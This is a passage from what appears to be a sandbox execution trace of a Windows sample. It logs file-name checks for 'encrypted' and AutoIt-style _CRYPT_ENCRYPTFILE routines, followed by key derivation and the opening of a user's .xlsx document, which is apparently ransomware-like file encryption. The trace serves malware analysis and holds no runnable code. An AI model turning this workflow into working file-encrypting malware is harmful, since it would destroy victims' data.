lpString2="encrypted", cchCount2=9) returned 3 [0032.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Nx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ckwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Gvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0032.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0032.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0032.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0032.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0032.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0032.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c20c0 [0032.516] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0032.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0032.516] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0032.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0032.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0032.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af478 [0032.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0032.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0032.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0032.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0032.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5e8 [0032.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0032.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0032.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0032.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0032.516] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0032.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0032.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0032.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4f8 [0032.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0032.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0032.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0032.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0032.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd60 [0032.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0032.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0032.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0032.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0032.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0032.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0032.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0032.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0032.517] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0032.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0032.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0032.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0032.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0032.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0032.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0032.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0032.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0032.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0032.518] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0032.518] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0032.518] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.518] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.518] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.518] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.518] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0032.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0032.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0032.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0032.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0032.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0032.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0032.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0032.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0032.518] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.518] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.518] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.518] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.518] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20ccdd0, ftCreationTime.dwHighDateTime=0x1d5a18a, ftLastAccessTime.dwLowDateTime=0xd381df0, ftLastAccessTime.dwHighDateTime=0x1d55e4a, ftLastWriteTime.dwLowDateTime=0xd381df0, ftLastWriteTime.dwHighDateTime=0x1d55e4a, nFileSizeHigh=0x0, nFileSizeLow=0x72dd, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="-pFtJlZNx-ioickwGvw.xlsx", cAlternateFileName="-PFTJL~1.XLS")) returned 0x7c2240 [0032.518] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0032.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0032.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0032.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0032.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.519] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0032.519] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0032.519] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0032.519] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.519] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.519] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0032.519] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0032.519] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0032.519] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0032.519] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0032.519] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0032.519] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0032.519] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.519] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0032.519] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.519] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.519] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0032.519] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.519] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0032.520] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0032.520] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.520] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0032.520] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0032.520] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.520] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0032.520] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0032.520] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.520] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.520] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0032.520] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0032.520] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0032.520] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.520] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.520] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0032.520] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0032.520] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0032.521] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0032.521] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0032.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0032.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0032.521] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.521] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0032.521] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0032.521] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0032.521] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.521] CryptHashData (hHash=0x7c2100, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0032.521] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0032.521] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0032.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0032.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0032.521] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.521] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0032.521] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0032.521] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.522] CryptDestroyHash (hHash=0x7c2100) returned 1 [0032.522] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pftjlznx-ioickwgvw.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0032.522] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.522] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0032.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0032.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0032.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0032.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0032.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0032.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0032.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0032.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0032.522] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0032.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0032.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0032.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0032.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0032.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0032.522] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0032.522] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0032.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0032.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0032.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0032.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0032.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0032.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0032.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0032.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0032.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0032.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0032.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0032.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0032.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0032.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0032.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0032.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0032.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0032.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0032.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0032.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0032.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0032.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0032.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0032.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0032.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0032.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0032.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | 